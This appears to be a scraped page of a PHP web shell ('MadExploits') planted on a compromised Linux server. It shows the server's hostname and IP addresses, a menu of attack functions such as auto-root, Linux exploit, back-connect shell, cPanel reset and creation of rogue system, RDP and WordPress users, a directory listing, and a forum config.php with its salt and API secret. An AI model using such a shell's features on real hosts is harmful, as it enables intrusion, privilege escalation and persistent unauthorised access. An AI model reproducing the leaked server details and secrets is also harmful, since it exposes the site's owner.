Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 172.70.178.223
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
carbon /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
1.52
KB
-rw-r--r--
config.php
1.33
KB
-rw-r--r--
edit.php
4.29
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
299
B
-rw-r--r--
import.php
3.09
KB
-rw-r--r--
info.xml
1.87
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.29
KB
-rw-r--r--
install.xml
565
B
-rw-r--r--
md5
5.95
KB
-rw-r--r--
notes.txt
80
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php // set automatically the time zone date_default_timezone_set('Asia/Shanghai'); define('DEBUG_MODE', false); // Salt for Cookie and Form // Free to modify define('SALT', 'AuthorIsLinCanbin'); define('PREFIX', 'carbon_'); define('InternalAccess', true); /*模板文件使用 if (!defined('InternalAccess')) exit('error: 403 Access Denied'); 来防止模板文件被游客访问 */ define('ForumLanguage', 'en'); //MemCache(d) / Redis define('EnableMemcache', false); define('MemCacheHost', 'localhost'); define('MemCachePort', 11211);//Memcache: 11211, Redis: 6379 define('MemCachePrefix', 'carbon_'); //Database define('DBHost', '[[softdbhost]]'); define('DBPort', '3306'); define('DBName', '[[softdb]]'); define('DBUser', '[[softdbuser]]'); define('DBPassword', '[[softdbpass]]'); //Sphinx Server define('SearchServer', ''); define('SearchPort', ''); define('LanguagePath', __DIR__ . '/language/' . ForumLanguage . '/'); define('LibraryPath', __DIR__ . '/library/'); define('ServicePath', __DIR__ . '/service/'); // API checking data // List<Map<String APIKey, String APISecret>> // Free to modify $APISignature = array(); $APISignature['12450'] = 'b40484df0ad979d8ba7708d24c301c38'; if (DEBUG_MODE) { //Enable error report error_reporting(E_ALL); ini_set('display_errors', 'On'); } else { //Disable error report ini_set('display_errors', 'Off'); }
Close